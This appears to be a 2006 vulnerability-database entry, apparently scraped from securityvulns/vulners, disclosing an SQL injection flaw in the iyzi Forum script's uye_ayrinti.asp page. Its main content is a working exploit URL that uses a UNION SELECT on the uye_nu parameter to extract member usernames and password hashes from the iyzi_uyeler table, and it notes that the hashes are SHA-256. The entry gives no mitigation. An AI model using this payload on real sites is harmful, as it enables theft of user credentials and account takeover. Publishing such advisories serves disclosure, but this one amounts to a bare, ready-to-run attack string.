Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14411
HistorySep 25, 2006 - 12:00 a.m.

iyzi Forum s1 b2 (tr) SQL Injection Vulnerability

2006-09-2500:00:00
vulners.com
218

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  • iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
  • Author : Fix TR +
  • Site : www.hack.gen.tr +
  • Contact : fixtr[at]bsdmail.com +
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256